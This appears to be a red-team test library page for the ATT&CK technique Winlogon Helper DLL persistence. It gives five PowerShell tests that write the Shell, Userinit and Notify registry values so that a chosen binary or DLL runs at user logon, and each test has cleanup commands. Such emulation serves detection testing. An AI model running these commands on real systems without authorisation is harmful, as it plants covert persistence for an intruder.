T1547.004 - Boot or Logon Autostart Execution: Winlogon Helper DLL

Description from ATT&CK

Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\Software[\\Wow6432Node\\]\Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalities that support Winlogon.(Citation: Cylance Reg Persistence Sept 2013) Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013) * Winlogon\Notify - points to notification package DLLs that handle Winlogon events * Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on * Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on Adversaries may take advantage of these features to repeatedly execute malicious code and establish persistence.

Atomic Tests


Atomic Test #1 - Winlogon Shell Key Persistence - PowerShell

PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe.

Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff.

Supported Platforms: Windows

auto_generated_guid: bf9f9d65-ee4d-4c3e-a843-777d04f19c38

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | binary_to_execute | Path of binary to execute | path | C:\Windows\System32\cmd.exe|

Attack Commands: Run with
1
powershell
!

1
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force

Cleanup Commands:

1
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore



Atomic Test #2 - Winlogon Userinit Key Persistence - PowerShell

PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe.

Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff.

Supported Platforms: Windows

auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | binary_to_execute | Path of binary to execute | path | C:\Windows\System32\cmd.exe|

Attack Commands: Run with
1
powershell
!

1
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force

Cleanup Commands:

1
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore



Atomic Test #3 - Winlogon Notify Key Logon Persistence - PowerShell

PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon.

Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon.

Please note that Winlogon Notifications have been removed as of Windows Vista / Windows Server 2008 and that this test thus only applies to erlier versions of Windows.

Supported Platforms: Windows

auto_generated_guid: d40da266-e073-4e5a-bb8b-2b385023e5f9

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | binary_to_execute | Path of notification package to execute | path | C:\Windows\Temp\atomicNotificationPackage.dll| | function_to_execute | Function in notification package to execute | string | AtomicTestFunction|

Attack Commands: Run with
1
powershell
!

1
2
3
4
5
New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "DllName" "#{binary_to_execute}" -Type ExpandString -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Logon" "#{function_to_execute}" -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Impersonate" 1 -Type DWord -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Asynchronous" 0 -Type DWord -Force

Cleanup Commands:

1
Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force -ErrorAction Ignore



Atomic Test #4 - Winlogon HKLM Shell Key Persistence - PowerShell

PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe.

Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff.

Supported Platforms: Windows

auto_generated_guid: 95a3c42f-8c88-4952-ad60-13b81d929a9d

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | binary_to_execute | Path of binary to execute | path | C:\Windows\System32\cmd.exe|

Attack Commands: Run with
1
powershell
!

1
Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force

Cleanup Commands:

1
Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore



Atomic Test #5 - Winlogon HKLM Userinit Key Persistence - PowerShell

PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe.

Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff.

Supported Platforms: Windows

auto_generated_guid: f9b8daff-8fa7-4e6a-a1a7-7c14675a545b

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | binary_to_execute | Path of binary to execute | path | C:\Windows\System32\cmd.exe|

Attack Commands: Run with
1
powershell
!

1
Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force

Cleanup Commands:

1
Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore